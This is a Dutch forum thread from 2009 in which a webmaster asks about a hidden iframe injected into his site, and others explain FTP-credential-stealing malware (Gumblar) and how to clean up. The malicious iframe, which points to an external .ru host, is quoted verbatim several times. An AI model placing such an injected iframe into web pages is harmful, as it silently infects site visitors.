DIG Digital Corner
Alles wat je altijd al over computers, hardware, software, internet en elektronische gadgets had willen weten, maar niet op Tweakers.net durft te vragen.
Hallo,
Mensen op mijn site klagen over een virus en als ik ga kijken in de index file stond er opeens dit in:
<iframe src="http://a5j.ru:8080/ts/in.cgi?pepsi100" width=125 height=125 style="visibility: hidden"></iframe>
Iemand enig idee wat de fuck dit is en hoe dat daar komt????
Mensen op mijn site klagen over een virus en als ik ga kijken in de index file stond er opeens dit in:
<iframe src="http://a5j.ru:8080/ts/in.cgi?pepsi100" width=125 height=125 style="visibility: hidden"></iframe>
Iemand enig idee wat de fuck dit is en hoe dat daar komt????
Wat dit is? Een virus.
Hoe het er komt? Iemand heeft je index aangepast?
Hoe? Lekke server, brakke code of brakke FTP gegevens.
Hoe het er komt? Iemand heeft je index aangepast?
Hoe? Lekke server, brakke code of brakke FTP gegevens.
There is no better way of exercising the imagination than the study of law.
No poet ever interpreted nature as freely as a lawyer interprets truth.
Jean Giraudoux, "Tiger at the Gates"
No poet ever interpreted nature as freely as a lawyer interprets truth.
Jean Giraudoux, "Tiger at the Gates"
liftquote:Op maandag 13 juli 2009 20:31 schreef Ezechielk het volgende:
Wat dit is? Een virus.
Hoe het er komt? Iemand heeft je index aangepast?
Hoe? Lekke server, brakke code of brakke FTP gegevens.
een verwijzing naar een andere site/bestand...
hoe dat komt? omdat je je beveiliging te laag hebt staan!
hoe dat komt? omdat je je beveiliging te laag hebt staan!
Het schijnt idd dat een of ander virus in imloop is wat ftp gegevens steelt en zijn eigen kutlinks in je php bestanden kopieert... echt welke nerd maakt zon kankerprogramme...
opknopen zoiets
opknopen zoiets
Er heeft waarschijnlijk ooit een virus of trojan op je computer gestaan (als ie er nog niet steeds op staat), die iframes automatisch wegschrijft naar alle bestanden waar HTML in zit. Als je zo'n html bestand vervolgens op je site zet zonder de source code te checken krijg je dit soort dingen.
Tip: alle html bestanden checken op iframes en die eruit gooien. (Gewoon alle code tussen/inclusief <iframe....></iframe>) Dan ook je computer scannen. Bij mij vind Avast! iig foute iframes.
Je kan dit al doen door via Windows te zoeken naar *.html, *.htm, *.php, *.asp bestanden die het woord 'iframe' bevatten, geloof ik.
Als jij die index er zelf niet neer hebt gezet, komt het van de server van je webhosting af. Zou in dat geval even contact opnemen met ze, want dat is nogal lomp...
Tip: alle html bestanden checken op iframes en die eruit gooien. (Gewoon alle code tussen/inclusief <iframe....></iframe>) Dan ook je computer scannen. Bij mij vind Avast! iig foute iframes.
Je kan dit al doen door via Windows te zoeken naar *.html, *.htm, *.php, *.asp bestanden die het woord 'iframe' bevatten, geloof ik.
Als jij die index er zelf niet neer hebt gezet, komt het van de server van je webhosting af. Zou in dat geval even contact opnemen met ze, want dat is nogal lomp...
En dat vind ik er dus van.
Kijk ook even of je site al op de zwarte lijst staat van Google. Gaat het eenvoudigst als je een site bezoekt met FireFox, je krijgt dan in plaats van de site in kwestie een rood waarschuwingsscherm te zien.quote:Op maandag 13 juli 2009 20:27 schreef FortunaHome het volgende:
Hallo,
Mensen op mijn site klagen over een virus en als ik ga kijken in de index file stond er opeens dit in:
<iframe src="http://a5j.ru:8080/ts/in.cgi?pepsi100" width=125 height=125 style="visibility: hidden"></iframe>
Iemand enig idee wat de fuck dit is en hoe dat daar komt????
De laatste tijd zijn er veel besmette websites gesignaleerd. Dat werkt als volgt:
1. Iemand bezoekt een (bonafide) reeds besmette website, die de computer van de bezoeker infecteert.
2. Een stukje malware op de zojuist besmette computer gaat op zoek naar FTP inloggegevens. Worden deze gevonden, dan worden ze doorgegeven aan de maker (c.q. verspreider) van de malware.
3. De maker c.q. verspreider van de malware gebruikt de buitgemaakte inloggegevens om de betreffende websites aan te passen c.q. te infecteren met een stukje obfuscated javascript o.i.d.
4. Nietsvermoedende bezoekers blijven de voorheen als betrouwbaar bekend staande site bezoeken, waardoor ook hún computers worden geïnfecteerd.
5. Ga terug naar stap 1 om te lezen wat er nu weer met deze computers gebeurt ...
Op deze manier ontstaat dus een soort sneeuwbaleffect. Je moet in ieder geval de computer(s) die je hebt gebruikt voor het updaten van je site onderzoeken op malware, tenminste één hiervan is besmet. Je moet natuurlijk ook meteen het FTP wachtwoord dat je gebruikt om je site te updaten wijzigen, want je inloggegevens zijn immers gestolen. En je moet alle pagina's van je site nakijken. Als je al op de zwarte lijst van Google terecht bent gekomen, dan kun je na het opschonen een verzoek indienen om je site opnieuw te laten scannen. Wordt de site dan clean bevonden, dan wordt deze weer van de zwarte lijst gehaald.
Wachtwoord is gewijzigd en ik heb ook de clown gevonden met dit virus op zijn pc.
Het lijkt er vooralsnog op dat alleen bestanden die met index beginnen zijn aangetast
Het lijkt er vooralsnog op dat alleen bestanden die met index beginnen zijn aangetast
Heb een aantal weken geleden hetzelfde gehad.. 6 (!) van mijn sites waren geïnfecteerd. Scannen met ad-aware en nod32, alle ftp wachtwoorden wijzigen (van een aantal had ik geen plesk of root toegang, moest ik weer heen en weer bellen met de hoster) en je bestanden opnieuw uploaden does the trick.
Bij sommige sites heb ik 2 weken lang elke dag het html bestand moeten downloaden en de iframe moeten verwijderen, op een vast tijdstip (half 8 smorgens) werd het automatisch weer geplaatst door een of ander kutscript die de hackers gebruiken.. Verder herken je de hidden iframe's meestal vet snel omdat het heel je layout verneukt. Hadden ze beter anders kunnen doen met een hidden div maargoed, dood aan die kuthackers.
Bij sommige sites heb ik 2 weken lang elke dag het html bestand moeten downloaden en de iframe moeten verwijderen, op een vast tijdstip (half 8 smorgens) werd het automatisch weer geplaatst door een of ander kutscript die de hackers gebruiken.. Verder herken je de hidden iframe's meestal vet snel omdat het heel je layout verneukt. Hadden ze beter anders kunnen doen met een hidden div maargoed, dood aan die kuthackers.
Ook last van gehad. Bewijst maar weer hoe kut windows is.
Als jij al je vrienden mee neemt kom ik ook alleen
Wat heeft dat er nu weer mee te maken?quote:Op maandag 13 juli 2009 21:16 schreef Adidah het volgende:
Om deze reden zou ik dus nooit een web server ook als werkstation gebruiken.
Als jij al je vrienden mee neemt kom ik ook alleen
Nou, wat denk je zelf?quote:Op maandag 13 juli 2009 21:16 schreef Ame_thyst het volgende:
[..]
Wat heeft dat er nu weer mee te maken?
Ik kom nooit op die sitequote:Blijkbaar heb jij -of iemand gebruik makend maakt van jouw IP adres- zich niet aan de voorschriften van onze site gehouden.
Ben je het niet eens met deze beslissing, stuur dan een email naar webmaster@fortunahome.com.
Dit virus jat FTP gegevens. Heeft niet veel te maken met workstation of servers.quote:
Iedere pc met een FTP client welke verbinding maakt met een webserver is de lul.
Als jij al je vrienden mee neemt kom ik ook alleen
Denk dat ik de opgeslagen wachtwoorden maar 'es uit m'n FTP-client ga verwijderen...quote:Op maandag 13 juli 2009 22:22 schreef Ame_thyst het volgende:
[..]
Dit virus jat FTP gegevens. Heeft niet veel te maken met workstation of servers.
Iedere pc met een FTP client welke verbinding maakt met een webserver is de lul.
En dat vind ik er dus van.
quote:Op maandag 13 juli 2009 22:22 schreef Ame_thyst het volgende:
[..]
Dit virus jat FTP gegevens. Heeft niet veel te maken met workstation of servers.
Iedere pc met een FTP client welke verbinding maakt met een webserver is de lul.
quote:Op maandag 13 juli 2009 22:24 schreef ukker het volgende:
[..]
Het gaat om de FTP-gegevens, denk je dat ik op een webserver ga lopen internetten
Daarom moet je dus ook geen wachtwoorden laten onthoudenquote:Op maandag 13 juli 2009 22:25 schreef AquaMaryn het volgende:
[..]
Denk dat ik de opgeslagen wachtwoorden maar 'es uit m'n FTP-client ga verwijderen...
. Als je wachtwoorden opslaat, maakt het qua beveiliging geen fuck meer uit of het om een werkstation of server gaat.
I know, maar het is zo makkelijk!! Wachtwoorden van websites sla ik sowieso nooit op, maar aan FTP had ik eigenlijk nooit gedacht, dat zit ten slotte in een apart client... maar daar heb je dus ook niets aan.quote:Op maandag 13 juli 2009 22:34 schreef Adidah het volgende:
[..]
[..]
[..]
Daarom moet je dus ook geen wachtwoorden laten onthouden
En dat vind ik er dus van.
Daarom zou een besturingssysteem gewoon een beveiligde keyring moeten hebben zodat niet ieder virus zomaar bij de opgeslagen wachtwoorden kan.quote:Op maandag 13 juli 2009 @ 22:34 schreef Adidah het volgende:
[..]
[..]
[..]
Daarom moet je dus ook geen wachtwoorden laten onthouden
Totdat slimme hackertjes die keyring weer weten te kraken...quote:Op dinsdag 14 juli 2009 00:09 schreef doppendoosch het volgende:
[..]
Daarom zou een besturingssysteem gewoon een beveiligde keyring moeten hebben zodat niet ieder virus zomaar bij de opgeslagen wachtwoorden kan.
En dat vind ik er dus van.
Thanks voor de tips allemaal. Ik heb de mensen die de site updaten geadviseerd het veranderde ftp wachtwoord niet meer op te slaan maar steeds zelf in te tikken. Dan ondervang je tenminste iets.
Ondertussen heeft onze hosting provider een backup teruggegooid van 3 dagen geleden, echter nu werken weer een hoop zaken niet.
Echt triest dat een paar van die blije hacker nerds ons zo ontzettend veel tijd kosten
Ondertussen heeft onze hosting provider een backup teruggegooid van 3 dagen geleden, echter nu werken weer een hoop zaken niet.
Echt triest dat een paar van die blije hacker nerds ons zo ontzettend veel tijd kosten
Waarschijnlijk is het gewoon een scriptkiddy die zich even lekker aan het uitleven was. Beetje slim omgaan met je inloggegevens ljikt me ook wel het meest vanzelfsprekende imho.quote:Op dinsdag 14 juli 2009 10:21 schreef FortunaHome het volgende:
Thanks voor de tips allemaal. Ik heb de mensen die de site updaten geadviseerd het veranderde ftp wachtwoord niet meer op te slaan maar steeds zelf in te tikken. Dan ondervang je tenminste iets.
Ondertussen heeft onze hosting provider een backup teruggegooid van 3 dagen geleden, echter nu werken weer een hoop zaken niet.
Echt triest dat een paar van die blije hacker nerds ons zo ontzettend veel tijd kosten
FTP
In the beginning, the universe was created. This made a lot of people very angry and has been widely regarded as a bad move.
Ja FTP ja... het moet een beetje simpel blijven om te updaten he... Het is een vrije tijds pagina die door vrijwilligers omhoog wordt gehouden.quote:
Maarja, je hebt altijd van die betweters als jij natuurlijk
Er is niks mis met FTP. Hoe wil je anders je pagina's uploaden. Zeker via een webinterface van Plesk of iets wat er op lijkt.
Dan ben je toch wel erg brak beveiligd als je ZULKE rotzooi op je computer hebt. Misschien eens wat minder rotzooi openen die je via Incredimail binnen krijgt. ;')
Misschien eens wat minder rotzooi openen die je via Incredimail binnen krijgt. ;')
ssh, rcp, scp?quote:
Er is niks mis met FTP. Hoe wil je anders je pagina's uploaden. Zeker via een webinterface van Plesk of iets wat er op lijkt.
Beatus vir qui suffert tentationem.
PSN Rinzewind en Cadsuana Melaidhrin
Stellar Blade *O* Sea of Stars *O* Trails Daybreak *O*
PSN Rinzewind en Cadsuana Melaidhrin
Stellar Blade *O* Sea of Stars *O* Trails Daybreak *O*
Dude...quote:
Er is niks mis met FTP. Hoe wil je anders je pagina's uploaden. Zeker via een webinterface van Plesk of iets wat er op lijkt.
RCP is ook unencrypted, dus onveilig... Iets over SSH (SCP, SFTP, of SVN+SSH) zijn wat mij betreft de way to go...quote:
In the beginning, the universe was created. This made a lot of people very angry and has been widely regarded as a bad move.
Ok, geen rcp dan 
CasB: FTP is zo LEK als een mandje. Dat is wat er mis mee is.
CasB: FTP is zo LEK als een mandje. Dat is wat er mis mee is.
Beatus vir qui suffert tentationem.
PSN Rinzewind en Cadsuana Melaidhrin
Stellar Blade *O* Sea of Stars *O* Trails Daybreak *O*
PSN Rinzewind en Cadsuana Melaidhrin
Stellar Blade *O* Sea of Stars *O* Trails Daybreak *O*
En hoe ga ik mensen die de hele dag op hun werk zitten en 's avonds in hun vrije tijd de pagina wat updaten uitleggen dat ze dit soort tools moeten gaan gebruiken 
Gaat niet werken dus we blijven bij ftp met de nodige risico's dan maar...
Gaat niet werken dus we blijven bij ftp met de nodige risico's dan maar...
ssh gaat op zelfde manier als ftp. Is alleen een andere poortquote:
En hoe ga ik mensen die de hele dag op hun werk zitten en 's avonds in hun vrije tijd de pagina wat updaten uitleggen dat ze dit soort tools moeten gaan gebruiken
Gaat niet werken dus we blijven bij ftp met de nodige risico's dan maar...
OpenSSH maakt bijvoorbeeld gebruik van sftp (secure ftp) ipv ftp.
Beatus vir qui suffert tentationem.
PSN Rinzewind en Cadsuana Melaidhrin
Stellar Blade *O* Sea of Stars *O* Trails Daybreak *O*
PSN Rinzewind en Cadsuana Melaidhrin
Stellar Blade *O* Sea of Stars *O* Trails Daybreak *O*
Dat gebeurt niet, want als dat zo makkelijk gaat kun je net zo goed gelijk die FTP-server kraken zonder omweg.quote:Op dinsdag 14 juli 2009 01:17 schreef AquaMaryn het volgende:
[..]
Totdat slimme hackertjes die keyring weer weten te kraken...
allemaal protocollen die niet gemaakt zijn voor bestandsoverdracht..quote:
ik heb gelukkig gewoon lokaal toegang tot server
mscheel weet weer eens perfect waar 'ie het over heeft hoor...quote:
[..]
allemaal protocollen die niet gemaakt zijn voor bestandsoverdracht..
ik heb gelukkig gewoon lokaal toegang tot server
Dude, lees je eens in voordat je dom gaat lopen bazelen, uberdummy...quote:Secure Copy or SCP is a means of securely transferring computer files between a local and a remote host or between two remote hosts, using the Secure Shell (SSH) protocol.
Bah bah...
In the beginning, the universe was created. This made a lot of people very angry and has been widely regarded as a bad move.
Whoops, niet iedereen heeft een eigen server en ik denk dat de meeste hosters alleen maar FTP access aanbieden voor eea. Zodra je een eigen server hebt is sftp wel de way to go.
In theory there is no difference between theory and practice. In practice there is.
You are rightquote:
Whoops, niet iedereen heeft een eigen server en ik denk dat de meeste hosters alleen maar FTP access aanbieden voor eea. Zodra je een eigen server hebt is sftp wel de way to go.
Hoogste tijd dus dat hosters standaard een veiliger methode gebruiken. Het is echt niets moeilijker dan FTP, zoals hier gesuggereerd wordt.
In the beginning, the universe was created. This made a lot of people very angry and has been widely regarded as a bad move.
Dit probleem doemt nu bij mij ook op op mijn door Joomla gestuurde site. Echter zit ik thuis hier op een Mac. Ik run voor de zekerheid een virusscanner maar het lijkt me een beetje niet mogelijk dat ik een trojan zou hebben.
De enkele andere plek waarop FTP gegevens van mijn server staan is op de windows PC op mijn werk, maar ik ben al sinds 1,5e week vrij. Het lijkt me niet dat zo'n script 10 dagen gaat wachten met het hacken van een server. Dan zou enkel een collega die op mijn computer heeft gezeten iets verdachts moeten hebben bekeken. Maar ja, dit houdt in dat ook alle sites van ons en onze klanten gevaar lopen, maar tot nu toe heb ik nog niets raars gezien op die sites.
De enkele andere plek waarop FTP gegevens van mijn server staan is op de windows PC op mijn werk, maar ik ben al sinds 1,5e week vrij. Het lijkt me niet dat zo'n script 10 dagen gaat wachten met het hacken van een server. Dan zou enkel een collega die op mijn computer heeft gezeten iets verdachts moeten hebben bekeken. Maar ja, dit houdt in dat ook alle sites van ons en onze klanten gevaar lopen, maar tot nu toe heb ik nog niets raars gezien op die sites.
[b]Op vrijdag 7 november 2008 08:54 schreef santax het volgende:[/b]
[..]
Blij dat er nog mensen hier zijn waar ik me wel in herken.
U, meneer MikeyMo, bent mijn nieuwe FOK!-held _O_
[..]
Blij dat er nog mensen hier zijn waar ik me wel in herken.
U, meneer MikeyMo, bent mijn nieuwe FOK!-held _O_
Overigens had de webhoster het erover dat het meer leek op Brute Force aangezien er zeker 825 keer geprobeerd was in te loggen oid. Dat lijkt me vaag aangezien je met hetw achtwoord wat je hebt gekaapt in 1x goed zit.
[b]Op vrijdag 7 november 2008 08:54 schreef santax het volgende:[/b]
[..]
Blij dat er nog mensen hier zijn waar ik me wel in herken.
U, meneer MikeyMo, bent mijn nieuwe FOK!-held _O_
[..]
Blij dat er nog mensen hier zijn waar ik me wel in herken.
U, meneer MikeyMo, bent mijn nieuwe FOK!-held _O_
Webserver draait op Unix.quote:Op maandag 13 juli 2009 21:16 schreef Ame_thyst het volgende:
Ook last van gehad. Bewijst maar weer hoe kut windows is.
Mailgozer moest eigenlijk MaleGozer zijn maarja...
ja, maar het virus wat de wachtwoorden zoekt en doorspeelt werkt in een windowsomgeving en kennelijk is het dus gewoon mogelijk dat wanneer een iframe wordt aangeroepen in een pagina met daarop een trojan windows zonder problemen deze gaat runnen.quote:
[b]Op vrijdag 7 november 2008 08:54 schreef santax het volgende:[/b]
[..]
Blij dat er nog mensen hier zijn waar ik me wel in herken.
U, meneer MikeyMo, bent mijn nieuwe FOK!-held _O_
[..]
Blij dat er nog mensen hier zijn waar ik me wel in herken.
U, meneer MikeyMo, bent mijn nieuwe FOK!-held _O_
gumblar virus blijkt nu. Komt binnen via adobe reader en adobe flash. Dr zitten lekker in. Updaten, van de abode shizzle is een must.
Ik hou van avast die een mooi alarm geeft en schreeuwt dat er een bad iframe is
-||||-----||||- Iron and me, we're meant to be -||||-----||||-
Tot ze een keylogger oid op hun pc hebben staanquote:Op dinsdag 14 juli 2009 10:21 schreef FortunaHome het volgende:
Thanks voor de tips allemaal. Ik heb de mensen die de site updaten geadviseerd het veranderde ftp wachtwoord niet meer op te slaan maar steeds zelf in te tikken. Dan ondervang je tenminste iets.
Ondertussen heeft onze hosting provider een backup teruggegooid van 3 dagen geleden, echter nu werken weer een hoop zaken niet.
Echt triest dat een paar van die blije hacker nerds ons zo ontzettend veel tijd kosten
Volgens mij jat die malware sowieso je logingegevens, ook al sla je ze niet op, omdat ik ergens las dat het je internetverkeer monitort. Dus op het moment dat je gaat ftp'en, komt er toch een keer je wachtwoord voorbij.
|
|
